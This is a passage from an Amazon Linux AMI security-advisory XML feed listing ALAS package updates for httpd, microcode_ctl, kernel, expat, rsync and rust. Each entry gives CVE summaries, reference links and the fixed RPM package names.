Apache HTTP Server versions 2.4.20 to 2.4.43 When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLevel of mod_http2 above "info" will mitigate this vulnerability for unpatched servers.
1866564: CVE-2020-11993 httpd: mod_http2 concurrent pool usage
CVE-2020-11984:
Apache HTTP server 2.4.32 to 2.4.44 mod_proxy_uwsgi info disclosure and possible RCE
1866563: CVE-2020-11984 httpd: mod_proxy_uswgi buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984" title="" id="CVE-2020-11984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11993" title="" id="CVE-2020-11993" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9490" title="" id="CVE-2020-9490" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.46" release="1.90.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.46-1.90.amzn1.noarch.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.46" release="1.90.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.46-1.90.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.46" release="1.90.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.46-1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1950</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1950: important priority package update for microcode_ctl</title><issued date="2024-10-28 17:34:00" /><updated date="2024-12-05 20:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24980:
Protection mechanism failure in some 3rd, 4th, and 5th Generation Intel(R) Xeon(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-24968:
NOTE: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01097.html
NOTE: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/releases/tag/microcode-20240910
DEBIANBUG: [1081363]
CVE-2024-24853:
Incorrect behavior order in transition between executive monitor and SMI transfer monitor (STM) in some Intel(R) Processor may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-23984:
NOTE: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01103.html
NOTE: https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/releases/tag/microcode-20240910
DEBIANBUG: [1081363]
CVE-2024-23918:
Improper conditions check in some Intel(R) Xeon(R) processor memory controller configurations when using Intel(R) SGX may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2024-21820:
Incorrect default permissions in some Intel(R) Xeon(R) processor memory controller configurations when using Intel(R) SGX may allow a privileged user to potentially enable escalation of privilege via local access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21820" title="" id="CVE-2024-21820" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23918" title="" id="CVE-2024-23918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23984" title="" id="CVE-2024-23984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24853" title="" id="CVE-2024-24853" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24968" title="" id="CVE-2024-24968" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24980" title="" id="CVE-2024-24980" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.44.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.44.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.44.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.44.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.44.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.44.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.44.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1951</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1951: medium priority package update for kernel</title><issued date="2024-11-09 00:22:00" /><updated date="2024-11-14 12:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-3567:
A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function inet6_stream_ops/inet6_dgram_ops of the component IPv6 Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. VDB-211090 is the identifier assigned to this vulnerability.
CVE-2022-3566:
A vulnerability, which was classified as problematic, was found in Linux Kernel. This affects the function tcp_getsockopt/tcp_setsockopt of the component TCP Handler. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The identifier VDB-211089 was assigned to this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3566" title="" id="CVE-2022-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3567" title="" id="CVE-2022-3567" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.350-188.564.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.350-188.564.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.350" release="188.564.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.350-188.564.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1952</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1952: important priority package update for kernel</title><issued date="2024-12-05 20:57:00" /><updated date="2025-03-13 20:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-47280:
In the Linux kernel, the following vulnerability has been resolved:
drm: Fix use-after-free read in drm_getunique()
CVE-2021-47245:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: synproxy: Fix out of bounds when parsing TCP options
CVE-2021-46992:
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nftables: avoid overflows in nft_hash_buckets()
CVE-2021-46938:
In the Linux kernel, the following vulnerability has been resolved:
dm rq: fix double free of blk_mq_tag_set in dev remove after table load fails
CVE-2021-33200:
A flaw was found in kernel/bpf/verifier.c in BPF in the Linux kernel. An incorrect limit is enforced for pointer arithmetic operations which can be abused to perform out-of-bounds reads and writes in kernel memory, leading to local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
CVE-2021-29650:
A denial-of-service (DoS) flaw was identified in the Linux kernel due to an incorrect memory barrier in xt_replace_table in net/netfilter/x_tables.c in the netfilter subsystem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29650" title="" id="CVE-2021-29650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33200" title="" id="CVE-2021-33200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46938" title="" id="CVE-2021-46938" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46992" title="" id="CVE-2021-46992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47245" title="" id="CVE-2021-47245" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47280" title="" id="CVE-2021-47280" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.238-125.421.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.238" release="125.421.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.238-125.421.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1953</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1953: important priority package update for expat</title><issued date="2025-01-06 23:07:00" /><updated date="2025-01-09 14:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-45490:
An issue was discovered in libexpat before 2.6.3. xmlparse.c does not reject a negative length for XML_ParseBuffer.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45490" title="" id="CVE-2024-45490" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat" version="2.1.0" release="15.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-15.35.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-15.35.amzn1.x86_64.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-15.35.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="15.35.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-15.35.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="15.35.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-15.35.amzn1.i686.rpm</filename></package><package name="expat" version="2.1.0" release="15.35.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-15.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1955</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1955: important priority package update for rsync</title><issued date="2025-01-16 06:35:00" /><updated date="2025-01-16 18:42:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-12747:
A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.
CVE-2024-12088:
A flaw was found in rsync. When using the `--safe-links` option, rsync fails to properly verify if a symbolic link destination contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory.
CVE-2024-12087:
A path traversal vulnerability exists in rsync. It stems from behavior enabled by the `--inc-recursive` option, a default-enabled option for many client options and can be enabled by the server even if not explicitly enabled by the client. When using the `--inc-recursive` option, a lack of proper symlink verification coupled with deduplication checks occurring on a per-file-list basis could allow a server to write files outside of the client's intended destination directory. A malicious server could write malicious files to arbitrary locations named after valid directories/paths on the client.
CVE-2024-12086:
A flaw was found in rsync. It could allow a server to enumerate the contents of an arbitrary file from the client's machine. This issue occurs when files are being copied from a client to a server. During this process, the rsync server will send checksums of local data to the client to compare with in order to determine what data needs to be sent to the server. By sending specially constructed checksum values for arbitrary files, an attacker may be able to reconstruct the data of those files byte-by-byte based on the responses from the client.
CVE-2024-12085:
A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12085" title="" id="CVE-2024-12085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12086" title="" id="CVE-2024-12086" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12087" title="" id="CVE-2024-12087" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12088" title="" id="CVE-2024-12088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12747" title="" id="CVE-2024-12747" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rsync-debuginfo" version="3.0.6" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-debuginfo-3.0.6-12.17.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsync-3.0.6-12.17.amzn1.x86_64.rpm</filename></package><package name="rsync" version="3.0.6" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-3.0.6-12.17.amzn1.i686.rpm</filename></package><package name="rsync-debuginfo" version="3.0.6" release="12.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsync-debuginfo-3.0.6-12.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1956</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1956: important priority package update for rust</title><issued date="2025-01-22 02:08:00" /><updated date="2025-01-24 11:31:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-24577:
libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24577" title="" id="CVE-2024-24577" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rust-std-static" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-std-static-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-src" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-src-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rust" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-gdb" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-gdb-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rust-analyzer" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-analyzer-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="clippy" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/clippy-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-lldb" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-lldb-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rust-debugger-common" version="1.68.2" release="1.66.amzn1" epoch="0" arch="noarch"><filename>Packages/rust-debugger-common-1.68.2-1.66.amzn1.noarch.rpm</filename></package><package name="rustfmt" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rustfmt-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-doc" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-doc-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="cargo" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/cargo-1.68.2-1.66.amzn1.x86_64.rpm</filename></package><package name="rust-analysis" version="1.68.2" release="1.66.amzn1" epoch="0" arch="x86_64"><filename>Packages/rust-analysis-1.68.2-1.66.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1957</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1957: important priority package update for kernel</title><issued date="2025-01-30 04:16:00" /><updated date="2025-02-05 10:41:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-50230:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix kernel bug due to missing clearing of checked flag
CVE-2024-50067:
In the Linux kernel, the following vulnerability has been resolved:
uprobe: avoid out-of-bounds memory access of fetching args
CVE-2024-49936:
In the Linux kernel, the following vulnerability has been resolved:
net/xen-netback: prevent UAF in xenvif_flush_hash()
CVE-2024-49884:
In the Linux kernel, the following vulnerability has been resolved:
ext4: fix slab-use-after-free in ext4_split_extent_at()
CVE-2024-47742:
In the Linux kernel, the following vulnerability has been resolved:
firmware_loader: Block path traversal
CVE-2024-47701:
In the Linux kernel, the following vulnerability has been resolved:
ext4: avoid OOB when system.data xattr changes underneath the filesystem
CVE-2024-26852:
In the Linux kernel, the following vulnerability has been resolved:
net/ipv6: avoid possible UAF in ip6_route_mpath_notify()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26852" title="" id="CVE-2024-26852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47701" title="" id="CVE-2024-47701" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47742" title="" id="CVE-2024-47742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49884" title="" id="CVE-2024-49884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49936" title="" id="CVE-2024-49936" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50067" title="" id="CVE-2024-50067" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50230" title="" id="CVE-2024-50230" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="195.582.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-195.582.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="195.582.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-195.582.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="195.582.amzn1" 